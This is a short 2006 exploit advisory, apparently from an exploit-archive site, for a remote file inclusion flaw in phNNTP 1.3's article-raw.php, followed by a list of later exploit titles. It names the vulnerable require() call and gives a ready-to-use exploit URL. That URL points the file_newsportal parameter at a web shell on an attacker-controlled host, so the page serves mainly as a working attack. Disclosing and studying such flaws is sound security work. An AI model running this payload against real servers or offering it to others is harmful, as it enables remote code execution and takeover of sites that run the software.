exploits , vulnerabilities , articles , phNNTP <= 1.3 (article-raw.php) Remote File Include Vulnerability

2006-08-07

phNNTP <= 1.3 (article-raw.php) Remote File Include Vulnerability

Rated as : High Risk

phNNTP v1.3 Remote File Inclusion

CreW: ToxiC

Bug Found By Drago84

Source Code:
http://freshmeat.net/redir/phnntp/16290/url_tgz/phNNTP-v1.3.tar.gz

Problem Is:
require("$file_newsportal");

Page Affect:
article-raw.php

Path:
Declare file_newsportal

ExP:
http://www.site.com/Dir_phNNTP/article-raw.php?file_newsportal=http://www.evalsite.com/shell.php?

Greatz: Str0ke
securitydot.net - 2006-08-07

Exploits - newest 10 RSS | More

2007-06-15 57321 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34238 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42478 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29359 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19793 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16728 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19435 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16616 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33637 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17253 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit